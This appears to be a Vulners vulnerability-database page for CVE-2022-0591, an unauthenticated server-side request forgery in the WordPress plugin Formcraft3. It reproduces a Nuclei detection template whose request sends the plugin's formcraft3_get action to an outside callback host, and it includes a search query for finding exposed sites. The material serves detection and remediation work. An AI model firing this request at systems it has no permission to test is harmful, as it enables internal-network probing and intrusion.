Vulners
Lucene search
Formcraft3 <3.8.28 - Server-Side Request Forgery
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2022-0591 | 21 Mar 202219:15 | – | attackerkb |
 | CVE-2022-0591 | 21 Mar 202221:26 | – | circl |
 | WordPress plugin FormCraft 代码问题漏洞 | 21 Mar 202200:00 | – | cnnvd |
 | CVE-2022-0591 | 21 Mar 202218:55 | – | cve |
 | CVE-2022-0591 Formcraft3 < 3.8.28 - Unauthenticated SSRF | 21 Mar 202218:55 | – | cvelist |
 | CVE-2022-0591 | 21 Mar 202219:15 | – | nvd |
 | CVE-2022-0591 | 21 Mar 202219:15 | – | osv |
 | WordPress Formcraft3 premium plugin <= 3.8.27 - Unauthenticated Server-Side Request Forgery (SSRF) vulnerability | 28 Feb 202200:00 | – | patchstack |
 | Design/Logic Flaw | 21 Mar 202219:15 | – | prion |
 | PT-2022-13286 · WordPress · Formcraft | 21 Mar 202200:00 | – | ptsecurity |
10
id: CVE-2022-0591
info:
name: Formcraft3 <3.8.28 - Server-Side Request Forgery
author: Akincibor,j4vaovo
severity: critical
description: |
Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
impact: |
An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning.
remediation: |
Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability.
reference:
- https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
- https://nvd.nist.gov/vuln/detail/CVE-2022-0591
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2022-0591
cwe-id: CWE-918
epss-score: 0.20774
epss-percentile: 0.97222
cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: subtlewebinc
product: formcraft3
framework: wordpress
fofa-query: "body=\"formcraft3\" && body=\"wp-\""
tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc,vkev,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
internal: true
words:
- '/wp-content/plugins/formcraft3/'
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: WordPress"
# digest: 4a0a0047304502201bcdbb1cc836a6fd96549824ae81e436bdaaf9b41e7790267709d8522d24e549022100bbbd7ed342d85c3addabf8b2435abb4ab5636ca1f62c2decd8b7b8059d05995d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.4
CVSS 3.19.1
EPSS0.20774